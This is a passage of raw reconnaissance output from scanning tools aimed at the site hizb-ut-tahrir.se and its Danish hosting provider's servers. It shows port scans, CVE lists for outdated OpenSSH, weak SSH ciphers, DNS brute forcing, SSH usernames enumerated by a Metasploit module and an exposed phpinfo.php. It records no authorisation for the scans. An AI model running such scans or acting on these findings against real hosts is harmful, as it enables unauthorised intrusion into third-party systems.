888 Scanning ip 185.25.141.15 (ns2.unoeuro.com (PTR)):
889 22/tcp open ssh syn-ack ttl 45 OpenSSH 7.4 (protocol 2.0)
890 | ssh-hostkey:
891 | 2048 14:8f:1f:90:fa:70:dd:8b:28:85:7d:f6:a3:f1:f7:ba (RSA)
892 |_ 256 c2:58:48:28:0f:4b:ee:10:0c:b1:4c:17:6c:ed:64:cc (ECDSA)
893 | vulners:
894 | cpe:/a:openbsd:openssh:7.4:
895 | CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919
896 |_ CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
897 53/tcp open domain? syn-ack ttl 47
898 | dns-nsid:
899 | NSID: ns2.unoeuro.com (6e73322e756e6f6575726f2e636f6d)
900 |_ id.server: ns2.unoeuro.com
901 | fingerprint-strings:
902 | DNSVersionBindReqTCP:
903 | version
904 |_ bind
905 111/tcp open rpcbind syn-ack ttl 45 2-4 (RPC #100000)
906 | rpcinfo:
907 | program version port/proto service
908 | 100000 2,3,4 111/tcp rpcbind
909 | 100000 2,3,4 111/udp rpcbind
910 | 100000 3,4 111/tcp6 rpcbind
911 |_ 100000 3,4 111/udp6 rpcbind
912 3306/tcp open mysql syn-ack ttl 44 MySQL (unauthorized)
913 WebCrawling domain's web servers... up to 50 max links.
914
915 + URL to crawl: http://www.hizb-ut-tahrir.se.
916 + Date: 2020-01-16
917
918 + Crawling URL: http://www.hizb-ut-tahrir.se.:
919 + Links:
920 + Crawling http://www.hizb-ut-tahrir.se.
921 + Crawling http://www.hizb-ut-tahrir.se./hizb-ut-tahrir.se (404 Not Found)
922 + Crawling http://www.hizb-ut-tahrir.se./fonts.googleapis.com (404 Not Found)
923 + Crawling http://www.hizb-ut-tahrir.se./s.w.org (404 Not Found)
924 + Crawling http://www.hizb-ut-tahrir.se./fonts.googleapis.com/css?family=Roboto%3A400%2C400italic%2C700%2C700italic& (404 Not Found)
925 + Crawling http://www.hizb-ut-tahrir.se./fonts.googleapis.com/css?family=Oswald%3A400%2C300%2C700& (404 Not Found)
926 + Crawling http://www.hizb-ut-tahrir.se./
927 + Searching for directories...
928 - Found: http://www.hizb-ut-tahrir.se./fonts.googleapis.com/
929 + Searching open folders...
930 - http://www.hizb-ut-tahrir.se./fonts.googleapis.com/ (404 Not Found)
931 + Crawl finished successfully.
932----------------------------------------------------------------------
933Summary of http://http://www.hizb-ut-tahrir.se.
934----------------------------------------------------------------------
935+ Links crawled:
936 - http://www.hizb-ut-tahrir.se.
937 - http://www.hizb-ut-tahrir.se./
938 - http://www.hizb-ut-tahrir.se./fonts.googleapis.com (404 Not Found)
939 - http://www.hizb-ut-tahrir.se./fonts.googleapis.com/css?family=Oswald%3A400%2C300%2C700& (404 Not Found)
940 - http://www.hizb-ut-tahrir.se./fonts.googleapis.com/css?family=Roboto%3A400%2C400italic%2C700%2C700italic& (404 Not Found)
941 - http://www.hizb-ut-tahrir.se./hizb-ut-tahrir.se (404 Not Found)
942 - http://www.hizb-ut-tahrir.se./s.w.org (404 Not Found)
943 Total links crawled: 7
944
945+ Links to files found:
946 Total links to files: 0
947
948+ Externals links found:
1043 Total external links: 94
1044
1045+ Email addresses found:
1046 Total email address found: 0
1047
1048+ Directories found:
1049 - http://www.hizb-ut-tahrir.se./fonts.googleapis.com/ (404 Not Found)
1050 Total directories: 1
1051
1052+ Directory indexing found:
1053 Total directories with indexing: 0
1054
1055----------------------------------------------------------------------
1056
1057
1058 + URL to crawl: https://www.hizb-ut-tahrir.se.
1059 + Date: 2020-01-16
1060
1061 + Crawling URL: https://www.hizb-ut-tahrir.se.:
1062 + Links:
1063 + Crawling https://www.hizb-ut-tahrir.se.
1064 + Searching for directories...
1065 + Searching open folders...
1066
1067--Finished--
1068Summary information for domain hizb-ut-tahrir.se.
1069-----------------------------------------
1070
1071 Domain Ips Information:
1072 IP: 94.231.103.108
1073 HostName: mx.unoeuro.com Type: MX
1074 HostName: mx.unoeuro.com Type: PTR
1075 Country: Denmark
1076 Is Active: True (reset ttl 64)
1077 IP: 83.217.78.186
1078 HostName: ns3.unoeuro.com Type: NS
1079 HostName: ns3.unoeuro.com Type: PTR
1080 Country: Belgium
1081 Is Active: True (reset ttl 64)
1082 IP: 85.159.211.233
1083 HostName: ns4.unoeuro.com Type: NS
1084 HostName: ns4.unoeuro.com Type: PTR
1085 Country: United Kingdom
1086 Is Active: True (reset ttl 64)
1087 Port: 22/tcp open ssh syn-ack ttl 55 OpenSSH 5.3 (protocol 2.0)
1088 Script Info: | ssh-hostkey:
1089 Script Info: | 1024 26:89:db:e3:2f:2c:2c:7a:d3:18:9a:01:99:bd:09:87 (DSA)
1090 Script Info: |_ 2048 29:5e:d4:4e:b4:f2:4f:01:e8:4e:e5:8c:4f:98:c0:9a (RSA)
1091 Script Info: | vulners:
1092 Script Info: | cpe:/a:openbsd:openssh:5.3:
1093 Script Info: | CVE-2014-1692 7.5 https://vulners.com/cve/CVE-2014-1692
1094 Script Info: | CVE-2010-4478 7.5 https://vulners.com/cve/CVE-2010-4478
1095 Script Info: | CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
1096 Script Info: | CVE-2016-10708 5.0 https://vulners.com/cve/CVE-2016-10708
1097 Script Info: | CVE-2010-5107 5.0 https://vulners.com/cve/CVE-2010-5107
1098 Script Info: | CVE-2016-0777 4.0 https://vulners.com/cve/CVE-2016-0777
1099 Script Info: | CVE-2010-4755 4.0 https://vulners.com/cve/CVE-2010-4755
1100 Script Info: | CVE-2012-0814 3.5 https://vulners.com/cve/CVE-2012-0814
1101 Script Info: | CVE-2011-5000 3.5 https://vulners.com/cve/CVE-2011-5000
1102 Script Info: |_ CVE-2011-4327 2.1 https://vulners.com/cve/CVE-2011-4327
1103 Port: 53/tcp open domain? syn-ack ttl 55
1104 Script Info: | dns-nsid:
1105 Script Info: | NSID: ns4.unoeuro.com (6e73342e756e6f6575726f2e636f6d)
1106 Script Info: |_ id.server: ns4.unoeuro.com
1107 Script Info: | fingerprint-strings:
1108 Script Info: | DNSVersionBindReqTCP:
1109 Script Info: | version
1110 Script Info: |_ bind
1111 IP: 93.191.156.197
1112 HostName: www.hizb-ut-tahrir.se. Type: A
1113 Country: Denmark
1114 Is Active: True (reset ttl 64)
1115 Port: 21/tcp open tcpwrapped syn-ack ttl 43
1116 Port: 22/tcp open ssh syn-ack ttl 45 OpenSSH 5.3 (protocol 2.0)
1117 Script Info: | ssh-hostkey:
1118 Script Info: | 1024 fa:d3:03:2f:db:82:8d:21:30:46:74:25:37:bb:fa:3e (DSA)
1119 Script Info: |_ 2048 e1:2a:51:40:6c:bd:91:34:21:28:ab:59:64:59:9b:4a (RSA)
1120 Script Info: | vulners:
1121 Script Info: | cpe:/a:openbsd:openssh:5.3:
1122 Script Info: | CVE-2014-1692 7.5 https://vulners.com/cve/CVE-2014-1692
1123 Script Info: | CVE-2010-4478 7.5 https://vulners.com/cve/CVE-2010-4478
1124 Script Info: | CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
1125 Script Info: | CVE-2016-10708 5.0 https://vulners.com/cve/CVE-2016-10708
1126 Script Info: | CVE-2010-5107 5.0 https://vulners.com/cve/CVE-2010-5107
1127 Script Info: | CVE-2016-0777 4.0 https://vulners.com/cve/CVE-2016-0777
1128 Script Info: | CVE-2010-4755 4.0 https://vulners.com/cve/CVE-2010-4755
1129 Script Info: | CVE-2012-0814 3.5 https://vulners.com/cve/CVE-2012-0814
1130 Script Info: | CVE-2011-5000 3.5 https://vulners.com/cve/CVE-2011-5000
1131 Script Info: |_ CVE-2011-4327 2.1 https://vulners.com/cve/CVE-2011-4327
1132 Port: 80/tcp open http syn-ack ttl 44 Apache httpd
1133 Script Info: | http-methods:
1134 Script Info: |_ Supported Methods: OPTIONS HEAD GET POST
1135 Script Info: |_http-server-header: Apache
1136 Script Info: |_http-title: This server is operated by UnoEuro Webhosting
1137 Port: 443/tcp open ssl/http syn-ack ttl 43 Apache httpd
1138 Script Info: |_http-server-header: Apache
1139 Script Info: |_http-title: 403 Forbidden
1140 Script Info: | ssl-cert: Subject: commonName=*.unoeuro.com
1141 Script Info: | Subject Alternative Name: DNS:*.unoeuro.com, DNS:unoeuro.com
1142 Script Info: | Issuer: commonName=Sectigo RSA Domain Validation Secure Server CA/organizationName=Sectigo Limited/stateOrProvinceName=Greater Manchester/countryName=GB
1143 Script Info: | Public Key type: rsa
1144 Script Info: | Public Key bits: 2048
1145 Script Info: | Signature Algorithm: sha256WithRSAEncryption
1146 Script Info: | Not valid before: 2019-02-06T00:00:00
1147 Script Info: | Not valid after: 2021-02-05T23:59:59
1148 Script Info: | MD5: 672e f1c5 0cc7 d81f 31c1 9cd8 88cc 6bcc
1149 Script Info: |_SHA-1: 5c07 943f ab62 063e ae87 bb01 ef12 98d0 faae ac4e
1150 IP: 94.231.96.0
1151 Type: SPF
1152 Is Active: True (reset ttl 64)
1153 IP: 93.191.156.0
1154 Type: SPF
1155 Is Active: True (reset ttl 64)
1156 IP: 46.36.215.2
1157 HostName: ns1.unoeuro.com Type: NS
1158 HostName: ns1.unoeuro.com Type: PTR
1159 Country: Denmark
1160 Is Active: True (reset ttl 64)
1161 Port: 53/tcp open domain? syn-ack ttl 48
1162 Script Info: | dns-nsid:
1163 Script Info: | NSID: ns1.unoeuro.com (6e73312e756e6f6575726f2e636f6d)
1164 Script Info: |_ id.server: ns1.unoeuro.com
1165 Script Info: | fingerprint-strings:
1166 Script Info: | DNSVersionBindReqTCP:
1167 Script Info: | version
1168 Script Info: |_ bind
1169 IP: 185.25.141.15
1170 HostName: ns2.unoeuro.com Type: NS
1171 HostName: ns2.unoeuro.com Type: PTR
1172 Country: Denmark
1173 Is Active: True (reset ttl 64)
1174 Port: 22/tcp open ssh syn-ack ttl 45 OpenSSH 7.4 (protocol 2.0)
1175 Script Info: | ssh-hostkey:
1176 Script Info: | 2048 14:8f:1f:90:fa:70:dd:8b:28:85:7d:f6:a3:f1:f7:ba (RSA)
1177 Script Info: |_ 256 c2:58:48:28:0f:4b:ee:10:0c:b1:4c:17:6c:ed:64:cc (ECDSA)
1178 Script Info: | vulners:
1179 Script Info: | cpe:/a:openbsd:openssh:7.4:
1180 Script Info: | CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919
1181 Script Info: |_ CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
1182 Port: 53/tcp open domain? syn-ack ttl 47
1183 Script Info: | dns-nsid:
1184 Script Info: | NSID: ns2.unoeuro.com (6e73322e756e6f6575726f2e636f6d)
1185 Script Info: |_ id.server: ns2.unoeuro.com
1186 Script Info: | fingerprint-strings:
1187 Script Info: | DNSVersionBindReqTCP:
1188 Script Info: | version
1189 Script Info: |_ bind
1190 Port: 111/tcp open rpcbind syn-ack ttl 45 2-4 (RPC #100000)
1191 Script Info: | rpcinfo:
1192 Script Info: | program version port/proto service
1193 Script Info: | 100000 2,3,4 111/tcp rpcbind
1194 Script Info: | 100000 2,3,4 111/udp rpcbind
1195 Script Info: | 100000 3,4 111/tcp6 rpcbind
1196 Script Info: |_ 100000 3,4 111/udp6 rpcbind
1197 Port: 3306/tcp open mysql syn-ack ttl 44 MySQL (unauthorized)
1198
1199--------------End Summary --------------
1200-----------------------------------------
1201#####################################################################################################################################
1202----- hizb-ut-tahrir.se -----
1203
1204
1205Host's addresses:
1206__________________
1207
1208hizb-ut-tahrir.se. 1693 IN A 93.191.156.197
1209
1210
1211Wildcard detection using: eqoacoiospjp
1212_______________________________________
1213
1214eqoacoiospjp.hizb-ut-tahrir.se. 3600 IN A 93.191.156.197
1215
1216
1217!!!!!!!!!!!!!!!!!!!!!!!!!!!!
1218
1219 Wildcards detected, all subdomains will point to the same IP address
1220 Omitting results containing 93.191.156.197.
1221 Maybe you are using OpenDNS servers.
1222
1223!!!!!!!!!!!!!!!!!!!!!!!!!!!!
1224
1225
1226Name Servers:
1227______________
1228
1229ns3.unoeuro.com. 85604 IN A 83.217.78.186
1230ns4.unoeuro.com. 85604 IN A 85.159.211.233
1231ns1.unoeuro.com. 85818 IN A 46.36.215.2
1232ns2.unoeuro.com. 85604 IN A 185.25.141.15
1233
1234
1235Mail (MX) Servers:
1236___________________
1237
1238mx.unoeuro.com. 3051 IN A 94.231.103.108
1239
1240
1241
1242Brute forcing with /usr/share/dnsenum/dns.txt:
1243_______________________________________________
1244
1245mail.hizb-ut-tahrir.se. 2205 IN CNAME mail.unoeuro.com.
1246mail.unoeuro.com. 7 IN A 94.231.103.107
1247smtp.hizb-ut-tahrir.se. 2976 IN CNAME asmtp.unoeuro.com.
1248asmtp.unoeuro.com. 600 IN A 94.231.106.220
1249
1250
1251Launching Whois Queries:
1252_________________________
1253
1254 whois ip result: 93.191.156.0 -> 93.191.156.0/24
1255
1256
1257hizb-ut-tahrir.se_________________
1258
1259 93.191.156.0/24
1260######################################################################################################################################
1261WARNING: Duplicate port number(s) specified. Are you alert enough to be using Nmap? Have some coffee or Jolt(tm).
1262Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-16 19:32 EST
1263Nmap scan report for linux307.unoeuro.com (93.191.156.197)
1264Host is up (0.30s latency).
1265Not shown: 489 filtered ports, 3 closed ports
1266Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
1267PORT STATE SERVICE
126821/tcp open ftp
126922/tcp open ssh
127080/tcp open http
1271443/tcp open https
1272
1273Nmap done: 1 IP address (1 host up) scanned in 12.37 seconds
1274######################################################################################################################################
1275Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-16 19:32 EST
1276Nmap scan report for linux307.unoeuro.com (93.191.156.197)
1277Host is up (0.18s latency).
1278Not shown: 2 filtered ports
1279PORT STATE SERVICE
128053/udp open|filtered domain
128167/udp open|filtered dhcps
128268/udp open|filtered dhcpc
128369/udp open|filtered tftp
128488/udp open|filtered kerberos-sec
1285123/udp open|filtered ntp
1286139/udp open|filtered netbios-ssn
1287161/udp open|filtered snmp
1288162/udp open|filtered snmptrap
1289389/udp open|filtered ldap
1290500/udp open|filtered isakmp
1291520/udp open|filtered route
12922049/udp open|filtered nfs
1293
1294Nmap done: 1 IP address (1 host up) scanned in 4.12 seconds
1295######################################################################################################################################
1296Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-16 19:32 EST
1297NSE: Loaded 55 scripts for scanning.
1298NSE: Script Pre-scanning.
1299Initiating NSE at 19:32
1300Completed NSE at 19:32, 0.00s elapsed
1301Initiating NSE at 19:32
1302Completed NSE at 19:32, 0.00s elapsed
1303Initiating Parallel DNS resolution of 1 host. at 19:32
1304Completed Parallel DNS resolution of 1 host. at 19:32, 0.02s elapsed
1305Initiating SYN Stealth Scan at 19:32
1306Scanning linux307.unoeuro.com (93.191.156.197) [1 port]
1307Discovered open port 21/tcp on 93.191.156.197
1308Completed SYN Stealth Scan at 19:32, 0.27s elapsed (1 total ports)
1309Initiating Service scan at 19:32
1310Scanning 1 service on linux307.unoeuro.com (93.191.156.197)
1311Completed Service scan at 19:32, 0.77s elapsed (1 service on 1 host)
1312Initiating OS detection (try #1) against linux307.unoeuro.com (93.191.156.197)
1313Retrying OS detection (try #2) against linux307.unoeuro.com (93.191.156.197)
1314Initiating Traceroute at 19:32
1315Completed Traceroute at 19:32, 0.85s elapsed
1316Initiating Parallel DNS resolution of 12 hosts. at 19:32
1317Completed Parallel DNS resolution of 12 hosts. at 19:32, 0.99s elapsed
1318NSE: Script scanning 93.191.156.197.
1319Initiating NSE at 19:32
1320NSE Timing: About 71.23% done; ETC: 19:34 (0:00:30 remaining)
1321Completed NSE at 19:34, 90.81s elapsed
1322Initiating NSE at 19:34
1323Completed NSE at 19:34, 0.05s elapsed
1324Nmap scan report for linux307.unoeuro.com (93.191.156.197)
1325Host is up (0.42s latency).
1326
1327PORT STATE SERVICE VERSION
132821/tcp open tcpwrapped
1329Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
1330Device type: general purpose|firewall|storage-misc|VoIP phone
1331Running (JUST GUESSING): Linux 2.6.X|3.X (91%), WatchGuard Fireware 11.X (91%), Synology DiskStation Manager 5.X (90%), Grandstream embedded (85%)
1332OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/h:grandstream:gxv3275
1333Aggressive OS guesses: Linux 2.6.32 (91%), Linux 2.6.32 or 3.10 (91%), Linux 2.6.39 (91%), Linux 3.10 (91%), Linux 3.4 (91%), WatchGuard Fireware 11.8 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
1334No exact OS matches for host (test conditions non-ideal).
1335Uptime guess: 1.853 days (since Tue Jan 14 23:05:30 2020)
1336Network Distance: 13 hops
1337TCP Sequence Prediction: Difficulty=259 (Good luck!)
1338IP ID Sequence Generation: All zeros
1339
1340TRACEROUTE (using port 21/tcp)
1341HOP RTT ADDRESS
13421 370.25 ms 10.248.204.1
13432 370.34 ms salmondeal.com.0.116.160.in-addr.arpa (160.116.0.161)
13443 370.31 ms bzq-82-80-246-9.cablep.bezeqint.net (82.80.246.9)
13454 370.45 ms bzq-219-189-185.cablep.bezeqint.net (62.219.189.185)
13465 370.35 ms bzq-114-65-1.cust.bezeqint.net (192.114.65.1)
13476 370.39 ms bzq-179-161-218.pop.bezeqint.net (212.179.161.218)
13487 370.46 ms ae8.cr1-fra2.ip4.gtt.net (46.33.89.237)
13498 370.50 ms ae13.cr1-ams2.ip4.gtt.net (89.149.143.2)
13509 528.13 ms ge8-0.1000M.asd9nxg1.ip.tele.dk (213.200.75.30)
135110 213.06 ms ge8-0.1000M.asd9nxg1.ip.tele.dk (213.200.75.30)
135211 464.33 ms cpe.xe-5-0-0-100.sdnqe10.dk.customer.tdc.net (87.51.85.234)
135312 469.46 ms 212.237.248.5
135413 469.48 ms linux307.unoeuro.com (93.191.156.197)
1355
1356NSE: Script Post-scanning.
1357Initiating NSE at 19:34
1358Completed NSE at 19:34, 0.00s elapsed
1359Initiating NSE at 19:34
1360Completed NSE at 19:34, 0.00s elapsed
1361######################################################################################################################################
# general
(gen) banner: SSH-2.0-OpenSSH_5.3
(gen) software: OpenSSH 5.3
(gen) compatibility: OpenSSH 5.9-6.6, Dropbear SSH 2013.56+ (some functionality from 0.52)
(gen) compression: enabled (zlib@openssh.com)

# key exchange algorithms
(kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
 `- [info] available since OpenSSH 4.4
(kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
 `- [warn] using weak hashing algorithm
 `- [info] available since OpenSSH 2.3.0
(kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
 `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
(kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
 `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
 `- [warn] using small 1024-bit modulus
 `- [warn] using weak hashing algorithm
 `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28

# host-key algorithms
(key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
(key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
 `- [warn] using small 1024-bit modulus
 `- [warn] using weak random number generator could reveal the key
 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28

# encryption algorithms (ciphers)
(enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
(enc) aes192-ctr -- [info] available since OpenSSH 3.7
(enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
(enc) arcfour256 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
 `- [warn] using weak cipher
 `- [info] available since OpenSSH 4.2
(enc) arcfour128 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
 `- [warn] using weak cipher
 `- [info] available since OpenSSH 4.2
(enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
 `- [warn] using weak cipher mode
 `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
(enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
 `- [warn] using weak cipher
 `- [warn] using weak cipher mode
 `- [warn] using small 64-bit block size
 `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
(enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
 `- [fail] disabled since Dropbear SSH 0.53
 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
 `- [warn] using weak cipher mode
 `- [warn] using small 64-bit block size
 `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
(enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
 `- [warn] using weak cipher mode
 `- [warn] using small 64-bit block size
 `- [info] available since OpenSSH 2.1.0
(enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
 `- [warn] using weak cipher mode
 `- [info] available since OpenSSH 2.3.0
(enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
 `- [warn] using weak cipher mode
 `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
(enc) arcfour -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
 `- [warn] using weak cipher
 `- [info] available since OpenSSH 2.1.0
(enc) rijndael-cbc@lysator.liu.se -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
 `- [warn] using weak cipher mode
 `- [info] available since OpenSSH 2.3.0

# message authentication code algorithms
(mac) hmac-md5 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
 `- [warn] using encrypt-and-MAC mode
 `- [warn] using weak hashing algorithm
 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
(mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
 `- [warn] using weak hashing algorithm
 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
(mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
 `- [warn] using small 64-bit tag size
 `- [info] available since OpenSSH 4.7
(mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
(mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
(mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
 `- [warn] using encrypt-and-MAC mode
 `- [info] available since OpenSSH 2.5.0
(mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
 `- [warn] using encrypt-and-MAC mode
 `- [info] available since OpenSSH 2.1.0
(mac) hmac-sha1-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
 `- [warn] using encrypt-and-MAC mode
 `- [warn] using weak hashing algorithm
 `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
(mac) hmac-md5-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
 `- [warn] using encrypt-and-MAC mode
 `- [warn] using weak hashing algorithm
 `- [info] available since OpenSSH 2.5.0

# algorithm recommendations (for OpenSSH 5.3)
(rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
(rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
(rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
(rec) -ssh-dss -- key algorithm to remove
(rec) -arcfour -- enc algorithm to remove
(rec) -rijndael-cbc@lysator.liu.se -- enc algorithm to remove
(rec) -blowfish-cbc -- enc algorithm to remove
(rec) -3des-cbc -- enc algorithm to remove
(rec) -aes256-cbc -- enc algorithm to remove
(rec) -arcfour256 -- enc algorithm to remove
(rec) -cast128-cbc -- enc algorithm to remove
(rec) -aes192-cbc -- enc algorithm to remove
(rec) -arcfour128 -- enc algorithm to remove
(rec) -aes128-cbc -- enc algorithm to remove
(rec) -hmac-md5-96 -- mac algorithm to remove
(rec) -hmac-ripemd160 -- mac algorithm to remove
(rec) -hmac-sha1-96 -- mac algorithm to remove
(rec) -umac-64@openssh.com -- mac algorithm to remove
(rec) -hmac-md5 -- mac algorithm to remove
(rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
(rec) -hmac-sha1 -- mac algorithm to remove
#######################################################################################################################################
USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
RHOSTS => 93.191.156.197
RHOST => 93.191.156.197
[*] 93.191.156.197:22 - SSH - Using malformed packet technique
[*] 93.191.156.197:22 - SSH - Starting scan
[+] 93.191.156.197:22 - SSH - User 'admin' found
[+] 93.191.156.197:22 - SSH - User 'administrator' found
[+] 93.191.156.197:22 - SSH - User 'anonymous' found
[+] 93.191.156.197:22 - SSH - User 'backup' found
[+] 93.191.156.197:22 - SSH - User 'bee' found
[+] 93.191.156.197:22 - SSH - User 'ftp' found
[+] 93.191.156.197:22 - SSH - User 'guest' found
[+] 93.191.156.197:22 - SSH - User 'GUEST' found
[+] 93.191.156.197:22 - SSH - User 'info' found
[+] 93.191.156.197:22 - SSH - User 'mail' found
[+] 93.191.156.197:22 - SSH - User 'mailadmin' found
[+] 93.191.156.197:22 - SSH - User 'msfadmin' found
[+] 93.191.156.197:22 - SSH - User 'mysql' found
[+] 93.191.156.197:22 - SSH - User 'nobody' found
[+] 93.191.156.197:22 - SSH - User 'oracle' found
[+] 93.191.156.197:22 - SSH - User 'owaspbwa' found
[+] 93.191.156.197:22 - SSH - User 'postfix' found
[+] 93.191.156.197:22 - SSH - User 'postgres' found
[+] 93.191.156.197:22 - SSH - User 'private' found
[+] 93.191.156.197:22 - SSH - User 'proftpd' found
[+] 93.191.156.197:22 - SSH - User 'public' found
[+] 93.191.156.197:22 - SSH - User 'root' found
[+] 93.191.156.197:22 - SSH - User 'superadmin' found
[+] 93.191.156.197:22 - SSH - User 'support' found
[+] 93.191.156.197:22 - SSH - User 'sys' found
[+] 93.191.156.197:22 - SSH - User 'system' found
[+] 93.191.156.197:22 - SSH - User 'systemadmin' found
[+] 93.191.156.197:22 - SSH - User 'systemadministrator' found
[+] 93.191.156.197:22 - SSH - User 'test' found
[+] 93.191.156.197:22 - SSH - User 'tomcat' found
[+] 93.191.156.197:22 - SSH - User 'user' found
[+] 93.191.156.197:22 - SSH - User 'webmaster' found
[+] 93.191.156.197:22 - SSH - User 'www-data' found
[+] 93.191.156.197:22 - SSH - User 'Fortimanager_Access' found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
#######################################################################################################################################
HTTP/1.1 406 Not Acceptable
Date: Fri, 17 Jan 2020 00:37:27 GMT
Server: Apache
Content-Type: text/html; charset=iso-8859-1
####################################################################################################################################
http://93.191.156.197 [200 OK] Apache, Country[DENMARK][DK], HTML5, HTTPServer[Apache], IP[93.191.156.197], Open-Graph-Protocol[website], Title[This server is operated by UnoEuro Webhosting], UncommonHeaders[upgrade]
######################################################################################################################################

wig - WebApp Information Gatherer


Scanning http://93.191.156.197...
___________________ SITE INFO ____________________
IP Title
93.191.156.197 This server is operated by UnoEu

____________________ VERSION _____________________
Name Versions Type
Apache Platform
PHP 7.2.26 Platform

__________________ INTERESTING ___________________
URL Note Type
/phpinfo.php PHP info file Interesting

__________________________________________________
Time: 54.8 sec Urls: 599 Fingerprints: 40401
######################################################################################################################################
https://93.191.156.197 [302 Found] Apache, Country[DENMARK][DK], HTTPServer[Apache], IP[93.191.156.197], RedirectLocation[http://93.191.156.197/], Title[302 Found]
http://93.191.156.197/ [200 OK] Apache, Country[DENMARK][DK], HTML5, HTTPServer[Apache], IP[93.191.156.197], Open-Graph-Protocol[website], Title[This server is operated by UnoEuro Webhosting], UncommonHeaders[upgrade]
######################################################################################################################################
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-16 19:39 EST
NSE: Loaded 162 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 19:39
Completed NSE at 19:39, 0.00s elapsed
Initiating NSE at 19:39
Completed NSE at 19:39, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 19:39
Completed Parallel DNS resolution of 1 host. at 19:39, 0.02s elapsed
Initiating SYN Stealth Scan at 19:39
Scanning linux307.unoeuro.com (93.191.156.197) [1 port]
Discovered open port 443/tcp on 93.191.156.197
Completed SYN Stealth Scan at 19:39, 0.27s elapsed (1 total ports)
Initiating Service scan at 19:39
Scanning 1 service on linux307.unoeuro.com (93.191.156.197)
Completed Service scan at 19:40, 13.56s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against linux307.unoeuro.com (93.191.156.197)
Retrying OS detection (try #2) against linux307.unoeuro.com (93.191.156.197)
Initiating Traceroute at 19:40
Completed Traceroute at 19:40, 3.40s elapsed
